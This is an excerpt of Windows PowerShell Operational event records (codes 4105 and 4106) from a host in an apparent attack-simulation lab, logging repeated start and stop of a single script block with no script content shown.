Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470182
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470181
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470180
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470179
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470178
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470177
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470176
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470175
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470174
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470173
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470172
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470171
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470170
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470169
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470168
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470167
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470166
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470165
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470164
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470163
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470162
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470161
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470160
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470159
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470158
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470157
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470156
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470155
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470154
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470153
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470152
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470151
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470150
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470149
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470148
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470147
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470146
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470145
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470144
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470143
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470142
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470141
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470140
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470139
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470138
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470137
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470136
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470135
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470134
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470133
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470132
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470131
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470130
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470129
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
